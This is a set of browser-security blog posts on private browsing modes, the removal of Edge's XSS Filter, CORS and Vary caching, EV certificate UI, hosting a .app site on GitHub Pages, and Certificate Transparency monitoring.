browsers, perf, privacy, security

Private Mode Browsers

InPrivate Mode was introduced in Internet Explorer 8 with the goal of helping users improve their privacy against both local and remote threats. Safari introduced a privacy mode in 2005.

All leading browsers offer a “Private Mode” and they all behave in the same general ways.

HTTP Caching

While in Private mode, browsers typically ignore any previously cached resources and cookies. Similarly, the Private mode browser does not preserve any cached resources beyond the end of the browser session. These features help prevent a revisited website from trivially identifying a returning user (e.g. if the user’s identity were cached in a cookie or JSON file on the client) and help prevent “traces” that might be seen by a later user of the device.

In Firefox’s and Chrome’s Private modes, a memory-backed cache container is used for the HTTP cache, and its memory is simply freed when the browser session ends. Unfortunately, WinINET never implemented a memory cache, so in Internet Explorer InPrivate sessions, data is cached in a special WinINET cache partition on disk which is “cleaned up” when the InPrivate session ends.

Because this cleanup process may be unreliable, in 2017, Edge made a change to simply disable the cache while running InPrivate, a design decision with significant impact on the browser’s network utilization and performance. For instance, consider the scenario of loading an image gallery that shows one large picture per page and clicking “Next” ten times:

InPrivateVsRegular

Because the gallery reuses some CSS, JavaScript, and images across pages, disabling the HTTP cache means that these resources must be re-downloaded on every navigation, resulting in 50 additional requests and a 118% increase in bytes downloaded for those eleven pages. Sites that reuse even more resources across pages will be more significantly impacted.

Another interesting quirk of Edge’s InPrivate implementation is that the browser will not download FavIcons while InPrivate. Surprisingly (and likely accidentally), the suppression of FavIcon downloads also occurs in any non-InPrivate windows so long as any InPrivate window is open on the system.

Web Platform Storage

Akin to the HTTP caching and cookie behaviors, browsers running in Private mode must restrict access to HTTP storage (e.g. HTML5 localStorage, ServiceWorker/CacheAPI, IndexedDB) to help prevent association/identification of the user and to avoid leaving traces behind locally. In some browsers and scenarios, storage mechanisms are simply set to an “ephemeral partition” while in others the DOM APIs providing access to storage are simply configured to return “Access Denied” errors.

You can explore the behavior of various storage mechanisms by loading this test page in Private mode and comparing to the behavior in non-Private mode.

Within IE and Edge’s InPrivate mode, localStorage uses an in-memory store that behaves exactly like the sessionStorage feature. This means that InPrivate’s storage is (incorrectly) not shared between tabs, even tabs in the same browser instance.

Network Features

Beyond the typical Web Storage scenarios, browser’s Private Modes should also undertake efforts to prevent association of users’ Private instance traffic with non-Private instance traffic. Impacted features here include anything that has a component that behaves “like a cookie” including TLS Session Tickets, TLS Resumption, HSTS directives, TCP Fast Open, Token Binding, ChannelID, and the like.

Automatic Authentication

In Private mode, a browser’s AutoComplete features should be set to manual-fill mode to prevent a “NameTag” vulnerability, whereby a site can simply read an auto-filled username field to identify a returning user.

On Windows, most browsers support silent and automatic authentication using the current user’s Windows login credentials and either the NTLM and Kerberos schemes. Typically, browsers are only willing to automatically authenticate to sites on “the Intranet“. Some browsers behave differently when in Private mode, preventing silent authentication and forcing the user to manually enter or confirm an authentication request.

In Firefox Private Mode and Edge InPrivate, the browser will not automatically respond to a HTTP/401 challenge for Negotiate/NTLM credentials.

In Chrome Incognito, Brave Incognito, and IE InPrivate, the browser will automatically respond to a HTTP/401 challenge for Negotiate/NTLM credentials even in Private mode.

Notes:

  • In Edge, the security manager returns MustPrompt when queried for URLACTION_CREDENTIALS_USE.
  • Unfortunately Edge’s Kiosk mode runs InPrivate, meaning you cannot easily use Kiosk mode to implement a display that projects a dashboard or other authenticated data on your Intranet.
  • For Firefox to support automatic authentication at all, the
    network.negotiate-auth.allow-non-fqdn and/or network.automatic-ntlm-auth.allow-non-fqdn preferences must be adjusted.

Detection of Privacy Modes

While browsers generally do not try to advertise to websites that they are running inside Private modes, it is relatively easy for a website to feature-detect this mode and behave differently. For instance, some websites like the Boston Globe block visitors in Private Mode (forcing login) because they want to avoid circumvention of their “Non-logged-in users may only view three free articles per month” paywall logic.

Sites can detect privacy modes by looking for the behavioral changes that signal that a given browser is running in Private mode; for instance, indexedDB is disabled in Edge while InPrivate. Detectors have been built for each browser and wrapped in simple JavaScript libraries. Defeating Private mode detectors requires significant investment on the part of browsers (e.g. “implement an ephemeral mode for indexedDB”) and as a consequence most browsers have punted on this problem for the time being.

Advanced Private Modes

Generally, mainstream browsers have taken a middle ground in their privacy features, trading off some performance and some convenience for improved privacy. Users who are very concerned about maintaining privacy from a wider variety of threat actors need to take additional steps, like running their browser in a discardable Virtual Machine behind an anonymizing VPN/Proxy service, disabling JavaScript entirely, etc.

The Brave Browser offers a “Private Window with Tor” feature that routes traffic over the Tor anonymizing network; for many users this might be a more practical choice than the highly privacy-preserving Tor Browser Bundle, which offers additional options like built-in NoScript support to help protect privacy.

 

-Eric

Standard
browsers, security, storytelling

An Update on the Edge XSS Filter

In Windows 10 RS5 (aka the “October 2018 Update”), the venerable XSS Filter first introduced in 2008 with IE8 was removed from Microsoft Edge. The XSS Filter debuted in a time before Content Security Policy as a part of a basket of new mitigations designed to mitigate the growing exploitation of cross-site scripting attacks, joining older features like HTTPOnly cookies and the sandbox attribute for IFRAMEs.

The XSS Filter feature was a difficult one to land– only through the sheer brilliance and dogged persistence of its creator (David Ross) did the IE team accept the proposal that a client-side filtering approach could be effective with a reasonable false positive rate and good-enough performance to ship on-by-default. The filter was carefully tuned, firing only on cross-site navigation, and in need of frequent updates as security researchers inside and outside the company found tricks to bypass it. One of the most significant technical challenges for the filter concerned how it was layered into the page download pipeline, intercepting documents as they were received as raw text from the network. The filter relied evaluating dynamically-generated regular expressions to look for potentially executable markup in the response body that could have been reflected from the request URL or POST body. Evaluating the regular expressions could prove to be extremely expensive in degenerate cases (multiple seconds of CPU time in the worst cases) and required ongoing tweaks to keep the performance costs in check.

In 2010, the Chrome team shipped their similar XSS Auditor feature, which had the luxury of injecting its detection logic after the HTML parser runsdetecting and blocking reflections as they entered the script engine. By throttling closer to the point of vulnerability, its performance and accuracy is significantly improved over the XSS Filter.

Unfortunately, no matter how you implement it, clientside XSS filtration is inherently limited– of the four classes of XSS Attack, only one is potentially mitigated by clientside XSS filtration. Attackers have the luxury of tuning their attacks to bypass filters before they deploy them to the world, and the relatively slow ship cycles of browsers (6 weeks for Chrome, and at least a few months for IE of the era) meant that bypasses remained exploitable for a long time.

False positives are an ever-present concern– this meant that the filters have to be somewhat conservative, leading to false-negative bypasses (e.g. multi-stage exploits that performed a same-site navigation) and pronouncements that certain attack patterns were simply out-of-scope (e.g. attacks encoded in anything but the most popular encoding formats).

Early attempts to mitigate the impact of false positives (by default, neutering exploits rather than blocking navigation entirely) proved bypassable and later were abused to introduce XSS exploits in sites that would otherwise be free of exploit (!!!). As a consequence, browsers were forced to offer options that would allow a site to block navigation upon detection of a reflection, or disable the XSS filter entirely.

Surprisingly, even in the ideal case, best-of-class XSS filters can introduce information disclosure exploits into sites that are free of XSS vulnerabilities. XSS filters work by matching attacker-controlled request data to text in a victim response page, which may be cross-origin. Clientside filters cannot really determine whether a given string from the request was truly reflected into the response, or whether the string is naturally present in the response. This shortcoming creates the possibility that such a filter may be abused by an attacker to determine the content of a cross-origin page, a violation of Same Origin Policy. In a canonical attack, the attacker frames a victim page with a string of interest in it, then attempts to determine that string by making a series of successive guesses until it detects blocking by the XSS filter. For instance, xoSubframe.contentWindow.length exposes the count of subframes of a frame, even cross-origin. If the XSS filter blocks the loading of a frame, its subframe count is zero and the attacker can conclude that their guess was correct.

In Windows 10 RS4 (April 2018 update), Edge shipped its implementation of the Fetch standard, which redefines how the browser downloads content for page loads. As a part of this massive architectural shift, a regression was introduced in Edge’s XSS Filter that caused it to incorrectly determine whether a navigation was cross-origin. As a result, the XSS Filter began running its logic on same-origin navigations and skipping processing of cross-origin navigations, leading to a predictable flood of bug reports.

In the process of triaging these reports and working to address the regression, we concluded that the XSS Filter had long been on the wrong side of the cost/benefit equation and we elected to remove the XSS Filter from Edge entirely, matching Firefox (which never shipped a filter to begin with).

We encourage sites that are concerned about XSS attacks to use the client-side platform features available to them (Content-Security-Policy, HTTPOnly cookies, sandboxing) and the server-side patterns and frameworks that are designed to mitigate script injection attacks.

-Eric Lawrence

Standard
browsers, security, web

CORS and Vary

Yesterday, I started looking a site compatibility bug where a page’s layout is intermittently busted. Popping open the F12 Tools on the failing page, we see that a stylesheet is getting blocked because it lacks a CORS Access-Control-Allow-Origin response header:

NoStylesheetCORS

We see that the client demands the header because the LINK element that references it includes a crossorigin=anonymous directive:

crossorigin="anonymous" href="//s.axs.com/axs/css/90a6f65.css?4.0.1194" type="text/css" />

Aside: It’s not clear why the site is using this directive. CORS is required to use  SubResource Integrity, but this resource does not include an integrity attribute. Perhaps the goal was to save bandwidth by not sending cookies to the “s” (static content) domain?

In any case, the result is that the stylesheet sometimes fails to load as you navigate back and forward.

Looking at the network traffic, we find that the static content domain is trying to follow the best practice Include Vary: Origin when using CORS for access control.

Unfortunately, it’s doing so in a subtly incorrect way, which you can see when diffing two request/response pairs for the stylesheet:

VaryDiff

As you can see in the diff, the Origin token is added only to the response’s Vary directive when the request specifies an Origin header. If the request doesn’t specify an Origin, the server returns a response that lacks the Access-Control-* headers and also omits the Vary: Origin header.

That’s a problem. If the browser has the variant without the Access-Control directives in its cache, it will reuse that variant in response to a subsequent request… regardless of whether or not the subsequent request has an Origin header.

The rule here is simple: If your server makes a decision about what to return based on a what’s in a HTTP header, you need to include that header name in your Vary, even if the request didn’t include that header.

-Eric

PS: This seems to be a pretty common misconfiguration, which is mentioned in the fetch spec:


CORS protocol and HTTP caches

If CORS protocol requirements are more complicated than setting `Access-Control-Allow-Origin` to * or a static origin, `Vary` is to be used.

Vary: Origin

In particular, consider what happens if `Vary` is not used and a server is configured to send `Access-Control-Allow-Origin` for a certain resource only in response to a CORS request. When a user agent receives a response to a non-CORS request for that resource (for example, as the result of a navigation request), the response will lack `Access-Control-Allow-Origin` and the user agent will cache that response. Then, if the user agent subsequently encounters a CORS request for the resource, it will use that cached response from the previous non-CORS request, without `Access-Control-Allow-Origin`.

But if `Vary: Origin` is used in the same scenario described above, it will cause the user agent to fetch a response that includes `Access-Control-Allow-Origin`, rather than using the cached response from the previous non-CORS request that lacks `Access-Control-Allow-Origin`.

However, if `Access-Control-Allow-Origin` is set to * or a static origin for a particular resource, then configure the server to always send `Access-Control-Allow-Origin` in responses for the resource — for non-CORS requests as well as CORS requests — and do not use `Vary`.


 

Standard
browsers, security

Edge EV UI Requires SmartScreen

A user recently noticed that when loading Paypal.com in Microsoft Edge, the UI shown was the default HTTPS UI (a gray lock):

Non-EV-UI-For-Paypal

Instead of the fancier “green” UI shown for servers that present Extended Validation (EV) certificates:EV-for-Paypal

The user observed this on some Windows 10 machines but not others.

The variable that differed between those machines was the state of the Menu > Settings > Advanced > Windows Defender SmartScreen setting.

Edge only shows the green EV user interface when SmartScreen is enabled.

IE 11

Internet Explorer 11 on Windows 10 behaves the same way as prior versions of IE going back to IE7– the green EV UI requires either SmartScreen be enabled or that the option Tools > Internet Options > Advanced > Security > Check for Server Certificate Revocation be enabled.

Chrome

The Chrome team recently introduced a new setting, exposed via the chrome://flags/#simplify-https-indicator page, that controls how EV certificates are displayed in their Security Chip. A user (or a field trial) can configure sites with EV certificates to display using the default HTTPS UI.

ChromeEV

 

-Eric

Standard
browsers, security

Stop Spilling the Beans

I’ve written about Same Origin Policy a bunch over the years, with a blog series mapping it to the Read/Write/Execute mental model.

More recently, I wrote about why Content-Type headers matter for same-origin-policy enforcement.

I’ve just read a great paper on cross-origin infoleaks and current/future mitigations. If you’re interested in browser security, it’s definitely worth a read.

Standard
browsers, dev, security

Building your .APP website with NameCheap and GitHub Pages–A Visual Guide

I recently bought a few new domain names under the brand new .app top-level-domain (TLD). The .app TLD is awesome because it’s on the HSTSPreload list, meaning that browsers will automatically use only HTTPS for every request on every domain under .app, keeping connections secure and improving performance.

I’m not doing anything terribly exciting with these domains for now, but I’d like to at least put up a simple welcome page on each one. Now, in the old days of HTTP, this was trivial, but because .app requires HTTPS, that means I must get a certificate for each of my sites for them to load at all.

Fortunately, GitHub recently started supporting HTTPS on GitHub Pages with custom domains, meaning that I can easily get a HTTPS site up in running in just a few minutes.

1. Log into GitHub, go to your Repositories page and click New:

2. Name your new repository something reasonable:

3. Click to create a simple README file:

4. Edit the file

5. Click Commit new file

6. Click Settings on the repository

7. Scroll to the GitHub Pages section and choose master branch and click Save:

8. Enter your domain name in the Custom domain box and click Save

9. Login to NameCheap (or whatever DNS registrar you used) and click Manage for the target domain name:

10. Click the Advanced DNS tab:

11. Click Add New Record:

 

12. Enter four new A Records for host of @ with the list of IP addresses GitHub pages use:

13. Click Save All Changes.

14. Click Add New Record and add a new CNAME Record. Enter the host www and a target value of username.github.io. Click Save All Changes: 

15. Click the trash can icons to delete the two default DNS entries that NameCheap had for your domain previously:

16. Try loading your new site.

  • If you get a connection error, wait a few minutes for DNS to propagate and re-verify the DNS records you just added.
  • If you get a certificate error, look at the certificate. It’s probably the default GitHub certificate. If so, look in the GitHub Pages settings page and you may see a note that your certificate is awaiting issuance by LetsEncrypt.org. If so, just wait a little while.

  • After the certificate is issued, your site without errors:

 

Go forth and build great (secure) things!

-Eric Lawrence

Standard
security

Fight Phish with Facebook (and Certificate Transparency)

As of April 30th, Chrome now requires that all certificates issued by a public certificate authority be logged in multiple public Certificate Transparency (CT) logs, ensuring that anyone can audit all certificates that have been issued. CT logs allow site owners and security researchers to much more easily detect if a sloppy or compromised Certificate Authority has issued a certificate in error.

For instance, I own bayden.com, a site where I distribute freeware applications. I definitely want to hear about it if any CA issues a certificate for my site, because that’s a strong indication that my site’s visitors may be under attack. What’s cool is that CT also allows me to detect if someone got a certificate for a domain name that was suspiciously similar to my domain, for instance bȧyden.com.

Now, for the whole thing to work, I have to actually pay attention to the CT logs, and who’s got time for that? Someone else’s computer, that’s who.

The folks over at Facebook Security have built an easy-to-use interface that allows you to subscribe to notifications any time a domain you care about has a new certificate issued. Just enter a hostname and decide what sorts of alerts you’d like:

CTMonitor

You can even connect their system into webhooks if you’re looking for something more elaborate than email, although mail works just fine for me:

Notification

Beyond Facebook, there will likely be many other CT Monitoring services coming online over the next few years. For instance, the good folks at Hardenize have already integrated one into their broader security monitoring platform.

The future is awesome.

-Eric

Standard